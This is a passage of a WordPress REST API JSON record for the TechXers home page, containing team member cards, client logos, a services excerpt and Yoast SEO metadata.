13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"linkedin\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\"><path d=\"M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/ul>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t\t\t\t\t\t\t\t<div class=\"avatar\">\n\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/Mary.jpeg\" alt=\"Mary\"\/>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t <\/div>\n\t\t\t <div class=\"team-content\">\n\t\t\t <div class=\"name\">\n\t\t\t \t\t\t\t \t\tMary Nyambura\t\t\t \t\t\t\t <\/div>\n\t\t\t <div class=\"pos\">Developer| UX enthusiast | Animation <\/div>\n\t\t\t <\/div>\n\t\t\t<\/div><!-- \/.team-item -->\n\n\t\t\t\t\t\t\t\t\t\t<div class=\"team-item\">\n\t\t\t <div class=\"team-inner\">\n\t\t\t <div class=\"pop-overlay\">\n\t\t\t <div class=\"team-pop\">\n\t\t\t <div class=\"team-info\">\n\t\t\t\t\t\t\t\t<div class=\"name\">Grishon Nganga<\/div>\n\t\t\t\t\t\t\t\t<div class=\"pos\">Developer<\/div>\n\t\t\t\t\t\t\t\t<ul class=\"team-social\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"facebook\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\" fill=\"#fff;\"><path d=\"M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"twitter\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\"><path d=\"M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"linkedin\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\"><path d=\"M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/ul>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t\t\t\t\t\t\t\t<div class=\"avatar\">\n\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/WhatsApp-Image-2020-01-07-at-4.19.44-PM2.jpeg\" alt=\"WhatsApp Image 2020-01-07 at 4.19.44 PM(2)\"\/>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t <\/div>\n\t\t\t <div class=\"team-content\">\n\t\t\t <div class=\"name\">\n\t\t\t \t\t\t\t \t\tGrishon Nganga\t\t\t \t\t\t\t <\/div>\n\t\t\t <div class=\"pos\">Developer<\/div>\n\t\t\t <\/div>\n\t\t\t<\/div><!-- \/.team-item -->\n\n\t\t\t\t\t\t\t\t\t\t<div class=\"team-item\">\n\t\t\t <div class=\"team-inner\">\n\t\t\t <div class=\"pop-overlay\">\n\t\t\t <div class=\"team-pop\">\n\t\t\t <div class=\"team-info\">\n\t\t\t\t\t\t\t\t<div class=\"name\">FRANKLINE ODERO<\/div>\n\t\t\t\t\t\t\t\t<div class=\"pos\">UX\/UI Developer<\/div>\n\t\t\t\t\t\t\t\t<ul class=\"team-social\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"facebook\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\" fill=\"#fff;\"><path d=\"M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"twitter\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\"><path d=\"M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"linkedin\" href=\"#\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\"><path d=\"M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/ul>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t\t\t\t\t\t\t\t<div class=\"avatar\">\n\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/WhatsApp-Image-2020-01-07-at-4.19.44-PM1.jpeg\" alt=\"WhatsApp Image 2020-01-07 at 4.19.44 PM(1)\"\/>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t <\/div>\n\t\t\t <div class=\"team-content\">\n\t\t\t <div class=\"name\">\n\t\t\t \t\t\t\t \t\tFRANKLINE ODERO\t\t\t \t\t\t\t <\/div>\n\t\t\t <div class=\"pos\">UX\/UI Developer<\/div>\n\t\t\t <\/div>\n\t\t\t<\/div><!-- \/.team-item -->\n\n\t\t\t\t\t\t\t\t\t\t<div class=\"team-item\">\n\t\t\t <div class=\"team-inner\">\n\t\t\t <div class=\"pop-overlay\">\n\t\t\t <div class=\"team-pop\">\n\t\t\t <div class=\"team-info\">\n\t\t\t\t\t\t\t\t<div class=\"name\">Collins Kemboi<\/div>\n\t\t\t\t\t\t\t\t<div class=\"pos\">Team Lead<\/div>\n\t\t\t\t\t\t\t\t<ul class=\"team-social\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"facebook\" href=\"https:\/\/www.linkedin.com\/in\/collins-ke\/\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\" fill=\"#fff;\"><path d=\"M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<li><a class=\"linkedin\" href=\"https:\/\/www.linkedin.com\/in\/collins-ke\/\" target=\"_blank\"><i class=\"sydney-svg-icon\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 448 512\"><path d=\"M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z\"\/><\/svg><\/i><\/a><\/li>\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/ul>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t <\/div>\n\t\t\t\t\t\t\t\t\t\t<div class=\"avatar\">\n\t\t\t\t\t\t<img src=\"http:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/Collins.jpg\" alt=\"Collins\"\/>\n\t\t\t\t\t<\/div>\n\t\t\t\t\t\t\t\t <\/div>\n\t\t\t <div class=\"team-content\">\n\t\t\t <div class=\"name\">\n\t\t\t \t\t\t\t \t\tCollins Kemboi\t\t\t \t\t\t\t <\/div>\n\t\t\t <div class=\"pos\">Team Lead<\/div>\n\t\t\t <\/div>\n\t\t\t<\/div><!-- \/.team-item -->\n\n\t\t\t\t\t<\/div>\n\t\t\t\t\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-3f95b937 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"3f95b937\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-no\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4dbc513\" data-id=\"4dbc513\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-8b1ba85 elementor-widget elementor-widget-heading\" data-id=\"8b1ba85\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h4 class=\"elementor-heading-title elementor-size-default\">Our clients<\/h4>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-2777f995 elementor-widget elementor-widget-heading\" data-id=\"2777f995\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h5 class=\"elementor-heading-title elementor-size-default\">Driving technology for leading brands<\/h5>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<section class=\"elementor-section elementor-inner-section elementor-element elementor-element-38854519 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"38854519\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t\t\t<div class=\"elementor-row\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-7a116db4\" data-id=\"7a116db4\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6551911 elementor-widget elementor-widget-image\" data-id=\"6551911\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"200\" height=\"200\" src=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/download.png\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/download.png 200w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/download-150x150.png 150w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-3c94cd7c\" data-id=\"3c94cd7c\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-85b0127 elementor-widget elementor-widget-image\" data-id=\"85b0127\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"268\" height=\"300\" src=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/neutron-268x300.png\" class=\"attachment-medium size-medium\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/neutron-268x300.png 268w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/neutron-230x257.png 230w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/neutron-350x391.png 350w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/neutron-480x537.png 480w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/02\/neutron.png 500w\" sizes=\"(max-width: 268px) 100vw, 268px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-69ad28c\" data-id=\"69ad28c\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-9600406 elementor-widget elementor-widget-image\" data-id=\"9600406\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"640\" height=\"640\" src=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline.jpg 640w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline-300x300.jpg 300w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline-150x150.jpg 150w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline-230x230.jpg 230w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline-350x350.jpg 350w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/kazionline-480x480.jpg 480w\" sizes=\"(max-width: 640px) 100vw, 640px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-59b4893\" data-id=\"59b4893\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-6f2e800 elementor-widget elementor-widget-image\" data-id=\"6f2e800\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"350\" height=\"275\" src=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM-350x275.jpeg\" class=\"attachment-sydney-service-thumb size-sydney-service-thumb\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM-350x275.jpeg 350w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM-300x236.jpeg 300w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM-230x181.jpeg 230w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM-480x377.jpeg 480w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/07\/WhatsApp-Image-2020-07-22-at-7.55.22-PM.jpeg 718w\" sizes=\"(max-width: 350px) 100vw, 350px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t<div class=\"elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-1a3dcdb8\" data-id=\"1a3dcdb8\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-column-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t<div class=\"elementor-widget-wrap\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-c622f30 elementor-widget elementor-widget-image\" data-id=\"c622f30\" data-element_type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-image\">\n\t\t\t\t\t\t\t\t\t\t\t\t<img width=\"360\" height=\"457\" src=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/cfms_background.jpg\" class=\"attachment-large size-large\" alt=\"\" loading=\"lazy\" srcset=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/cfms_background.jpg 360w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/cfms_background-236x300.jpg 236w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/cfms_background-230x292.jpg 230w, https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/05\/cfms_background-350x444.jpg 350w\" sizes=\"(max-width: 360px) 100vw, 360px\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Our Services We Promise to create a stunning user-friendly Website or Mobile app that brings your business to life and makes your brand stand out from your competitors.We will understand your vision and develop something that is unique to your business App\/Web Development Partner with our experienced team and develop robust software application, whether you\u2019re […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/page_front-page.php","meta":{"spay_email":""},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.8 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Home - TechXers<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/techxers.co.ke\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Home - TechXers\" \/>\n<meta property=\"og:description\" content=\"Our Services We Promise to create a stunning user-friendly Website or Mobile app that brings your business to life and makes your brand stand out from your competitors.We will understand your vision and develop something that is unique to your business App\/Web Development Partner with our experienced team and develop robust software application, whether you\u2019re […]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/techxers.co.ke\/\" \/>\n<meta property=\"og:site_name\" content=\"TechXers\" \/>\n<meta property=\"article:modified_time\" content=\"2020-07-22T18:00:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/techxers.co.ke\/#website\",\"url\":\"https:\/\/techxers.co.ke\/\",\"name\":\"TechXers\",\"description\":\"we are love Innovation\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/techxers.co.ke\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"ImageObject\",\"@id\":\"https:\/\/techxers.co.ke\/#primaryimage\",\"inLanguage\":\"en-US\",\"url\":\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png\",\"contentUrl\":\"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png\",\"width\":1130,\"height\":564},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/techxers.co.ke\/#webpage\",\"url\":\"https:\/\/techxers.co.ke\/\",\"name\":\"Home - TechXers\",\"isPartOf\":{\"@id\":\"https:\/\/techxers.co.ke\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/techxers.co.ke\/#primaryimage\"},\"datePublished\":\"2019-10-25T09:50:44+00:00\",\"dateModified\":\"2020-07-22T18:00:56+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/techxers.co.ke\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/techxers.co.ke\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/techxers.co.ke\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/techxers.co.ke\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Home\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Home - TechXers","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/techxers.co.ke\/","og_locale":"en_US","og_type":"article","og_title":"Home - TechXers","og_description":"Our Services We Promise to create a stunning user-friendly Website or Mobile app that brings your business to life and makes your brand stand out from your competitors.We will understand your vision and develop something that is unique to your business App\/Web Development Partner with our experienced team and develop robust software application, whether you\u2019re […]","og_url":"https:\/\/techxers.co.ke\/","og_site_name":"TechXers","article_modified_time":"2020-07-22T18:00:56+00:00","og_image":[{"url":"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/techxers.co.ke\/#website","url":"https:\/\/techxers.co.ke\/","name":"TechXers","description":"we are love Innovation","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/techxers.co.ke\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"ImageObject","@id":"https:\/\/techxers.co.ke\/#primaryimage","inLanguage":"en-US","url":"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png","contentUrl":"https:\/\/techxers.co.ke\/wp-content\/uploads\/2020\/01\/logo.png","width":1130,"height":564},{"@type":"WebPage","@id":"https:\/\/techxers.co.ke\/#webpage","url":"https:\/\/techxers.co.ke\/","name":"Home - TechXers","isPartOf":{"@id":"https:\/\/techxers.co.ke\/#website"},"primaryImageOfPage":{"@id":"https:\/\/techxers.co.ke\/#primaryimage"},"datePublished":"2019-10-25T09:50:44+00:00","dateModified":"2020-07-22T18:00:56+00:00","breadcrumb":{"@id":"https:\/\/techxers.co.ke\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/techxers.co.ke\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/techxers.co.ke\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/techxers.co.ke\/"},{"@type":"ListItem","position":2,"name":"Home"}]}]}},"_links":{"self":[{"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/pages\/566"}],"collection":[{"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/techxers.co.ke\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/techxers.co.ke\/wp-json\/w